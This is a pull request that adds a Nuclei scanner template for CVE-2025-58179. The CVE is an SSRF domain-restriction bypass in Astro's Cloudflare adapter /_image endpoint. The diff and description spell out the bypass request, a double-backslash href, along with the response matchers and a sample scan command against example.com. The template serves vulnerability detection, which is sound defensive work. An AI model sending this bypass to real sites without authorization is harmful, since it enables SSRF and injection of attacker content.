### PR TITLE
Add CVE-2025-58179 template for Astro SSRF `bypass`

### DIFF
--- a/http/cves/2025/CVE-2025-58179.yaml
+++ b/http/cves/2025/CVE-2025-58179.yaml
@@ -17,7 +17,7 @@ info:
 http:
   - raw:
       - |
-        GET /_image?href=https://placehold.co/600x400&f=svg HTTP/1.1
+        GET /_image?href=\\placehold.co/600x400&f=svg HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and


### PR DESCRIPTION
# CVE-2025-58179: Astro Cloudflare Adapter SSRF `bypass`

## Overview
This template detects an SSRF vulnerability in Astro's Cloudflare adapter (_image endpoint) when configured with `output: 'server'` and the default `imageService: 'compile'`. The flaw allows bypassing domain restrictions on the `/_image` endpoint, potentially leading to unauthorized content delivery and SSRF/XSS attacks.

## Technique
- Bypass domain restriction using **double-backslash (\\)** in the `href` parameter.
- Template matches:
  - HTTP status `200`
  - `Content-Type: image/svg+xml` in headers
  - `<svg>` present in response body

## Template Path
http/cves/2025/CVE-2025-58179.yaml

## PoC (Safe / Example)
To safely demonstrate the template without testing real targets:

**Command:**
```bash
nuclei -t http/cves/2025/CVE-2025-58179.yaml -u https://example.com -debug
```
## Sample Output (-debug):
```bash
[CVE-2025-58179] [http] [high] https://example.com/_image?href=\placehold.co/600x400&f=svg
```
### References
- GitHub Advisory: GHSA-qpr4-c339-7vq8 (https://github.com/advisories/GHSA-qpr4-c339-7vq8)
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58179
- Issue: Fixes #13219